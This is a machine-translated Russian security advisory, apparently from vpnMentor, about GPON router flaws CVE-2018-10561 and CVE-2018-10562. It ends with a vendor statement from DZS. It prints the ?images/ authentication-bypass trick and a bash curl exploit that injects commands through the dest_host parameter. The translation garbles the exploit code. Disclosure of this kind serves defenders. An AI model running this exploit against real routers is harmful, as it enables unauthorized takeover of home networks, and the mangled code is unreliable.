В более чем миллионе домашних маршрутизаторов GPON обнаружена критическая уязвимость RCE


Два важных обновления с момента публикации этого отчета:

  1. Наша исследовательская группа создала патч, который может помочь заинтересованным пользователям. Пожалуйста, проверьте это здесь
  2. DASAN Zhone Solutions прислал нам свой комментарий к отчету. Мы прикрепляем его «как есть» в конце этой страницы

Обзор:

Мы провели комплексную оценку ряда домашних маршрутизаторов GPON. Многие маршрутизаторы сегодня используют Интернет GPON, и мы нашли способ обойти всю аутентификацию на устройствах (CVE-2018-10561). С этим обходом аутентификации, мы также смогли обнародовать еще одну уязвимость при внедрении команд (CVE-2018-10562) и выполнять команды на устройстве.

Эксплуатация:

В ходе анализа прошивок GPON мы обнаружили две различные критические уязвимости (CVE-2018-10561 & CVE-2018-10562), который в совокупности может обеспечить полный контроль над устройством и, следовательно, над сетью. Первая уязвимость использует механизм аутентификации устройства, которое имеет недостаток. Этот недостаток позволяет любому злоумышленнику обойти всю аутентификацию.

Недостаток можно найти на HTTP-серверах, которые проверяют определенные пути при аутентификации. Это позволяет злоумышленнику обойти аутентификацию на любой конечной точке, используя простой прием.

Добавив? Images / к URL, злоумышленник может обойти конечную точку.

Это работает как на HTML-страницах, так и на GponForm /

Например, вставив

/menu.html?images/
или
/ GponForm / diag_FORM? изображения /

мы можем управлять устройством.

Просматривая функциональные возможности устройства, мы заметили, что диагностическая конечная точка содержит команды ping и traceroute. Не потребовалось много времени, чтобы понять, что команды могут быть введены параметром host.

Поскольку маршрутизатор сохраняет результаты ping в / tmp и передает их пользователю при повторном посещении /diag.html, выполнить команды и получить их выходные данные с помощью уязвимости обхода аутентификации довольно просто..

Мы включили следующую версию кода эксплойта для bash:
#! / Bin / Баш

echo «[+] Отправка команды…»
# Мы отправляем команды с двумя режимами backtick (`) и точка с запятой (;), потому что разные модели запускаются на разных устройствах
curl -k -d “XWebPageName = diag&diag_action = пинг&wan_conlist = 0&dest_host = \ `$ 2 \`, $ 2&ipv = 0 ”$ 1 / GponForm / diag_Form? images / 2>/ dev / null 1>/ DEV / нуль
echo «[+] Ожидание….»
спать 3
echo «[+] Получение выходного файла….»
curl -k $ 1 / diag.html? images / 2>/ dev / null | grep ‘diag_result =‘ | sed -e ‘s / \\ n / \ n / g’

Влияние:

GPON - это тип пассивной оптической сети, которая использует волоконную оптику и особенно популярна. Когда люди используют GPON, маршрутизаторы предоставляются интернет-провайдерами. На видео вы можете увидеть, что более одного миллиона человек используют этот тип сетевого маршрутизатора.

Мы протестировали эту уязвимость на многих случайных GPON-маршрутизаторах и уязвимость была обнаружена на всех из них. Потому что очень многие люди используют эти типы маршрутизаторов, эта уязвимость может привести к компрометации всей сети.

Рекомендации:

  1. Проверьте, использует ли ваш маршрутизатор сеть GPON.
  2. Помните, что GPON-маршрутизаторы могут быть взломаны и использованы.
  3. Поговорите с вашим провайдером, чтобы узнать, что они могут сделать, чтобы исправить ошибку.
  4. Предупредите своих друзей на Facebook (нажмите здесь, чтобы поделиться) и Twitter (нажмите здесь, чтобы твитнуть).

Обновление: заявление от DZS относительно использования обхода аутентификации

DASAN Zhone Solutions, Inc. исследовала недавние сообщения в СМИ о том, что некоторые сетевые интерфейсные устройства (NID) DZS GPON, более известные как маршрутизаторы, могут быть уязвимы для эксплойта обхода аутентификации..

Компания DZS определила, что эта уязвимость подвержена влиянию данной уязвимости на серии ZNID-GPON-25xx и некоторые GP6 ONT серии H640 при работе на определенных версиях программного обеспечения. До настоящего времени в DZS не сообщалось о воздействии сервисов от этой уязвимости. После внутреннего расследования мы определили, что потенциальное воздействие намного более ограничено, чем сообщалось vpnMentor. Согласно отчетам о продажах DZS, в сочетании с полевыми данными, собранными на сегодняшний день, мы подсчитали, что число устройств GPON ONT, которые могут быть потенциально влияет менее чем на 240 000. Кроме того, учитывая относительную зрелость продуктов в их жизненном цикле, мы считаем, что воздействие ограничено еще меньшим количеством устройств.

История продукта

DZS ZNID-GPON-25xx и некоторые ONT серии H640, включая программное обеспечение, представившее эту уязвимость, были разработаны поставщиком OEM и перепроданы DZS. Разработанные и выпущенные более 9 лет назад, большинство из этих продуктов уже давно прослужили. Поскольку контракты на поддержку программного обеспечения больше не предлагаются для большинства этих продуктов, мы не имеем прямого представления об общем количестве устройств, которые все еще активно используются в полевых условиях..

разрешение

DZS проинформировал всех покупателей, которые приобрели эти модели, об этой уязвимости. Мы работаем с каждым клиентом, чтобы помочь ему оценить методы решения проблемы для устройств, которые все еще могут быть установлены на месте. Каждый клиент будет решать, как решить проблему с состоянием своего развернутого оборудования..

Миссия DZS - обеспечить соответствие всех своих решений самым высоким стандартам безопасности в отрасли. Мы используем эту и каждую возможность, чтобы пересмотреть и постоянно улучшать наши методологии проектирования и тестирования безопасности.

Brayan Jackson Administrator
Sorry! The Author has not filled his profile.
follow me